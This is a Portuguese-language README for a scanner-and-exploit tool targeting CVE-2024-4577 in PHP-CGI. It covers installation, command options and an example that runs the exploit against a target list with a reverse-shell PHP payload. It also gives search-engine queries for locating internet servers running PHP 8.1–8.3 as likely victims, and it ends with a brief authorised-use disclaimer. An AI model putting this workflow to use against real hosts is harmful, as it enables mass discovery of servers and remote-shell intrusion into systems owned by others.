

O CVE-2024-4577 é uma vulnerabilidade crítica que afeta aplicações PHP que utilizam a Interface de Gateway Comum (CGI). Esta ferramenta serve tanto como scanner quanto como exploit, permitindo que profissionais de cibersegurança:
# Clone the repository
git clone https://github.com/your-username/CVE-2024-4577-scanner.git
# Navigate to the project directory
cd CVE-2024-4577-scanner
# Install required dependencies
pip install -r requirements.txt
Certifique-se de ter o Python 3 instalado no seu sistema. Use a seguinte estrutura de comando:
python3 CVE-2024-4577.py [-h] -t TARGET_FILE [-s] [-e] [-p PAYLOAD_FILE]
-h, --help: Exibe a mensagem de ajuda e sai-t TARGET_FILE, --target-file TARGET_FILE: Arquivo contendo URLs alvo (obrigatório)-s, --scan: Realiza apenas a varredura de vulnerabilidades-e, --exploit: Tenta explorar a vulnerabilidade-p PAYLOAD_FILE, --payload-file PAYLOAD_FILE: Arquivo de payload PHP para exploraçãopython3 CVE-2024-4577.py -t targetsite.txt -e -p rev_shell.php
Utilize mecanismos de busca poderosos para identificar hosts potencialmente vulneráveis:
Pesquise servidores que executam as versões 8.1, 8.2 e 8.3 do PHP:
server: PHP 8.1, server: PHP 8.2, server: PHP 8.3, html:"phpinfo"
protocol="http" && (header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3")
Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e fins de pesquisa. Certifique-se de ter permissão explícita antes de fazer varreduras ou tentar explorar qualquer sistema que você não possua ou não tenha o direito de testar.
Se você encontrar algum problema ou tiver dúvidas, por favor, abra uma issue no rastreador de issues do GitHub.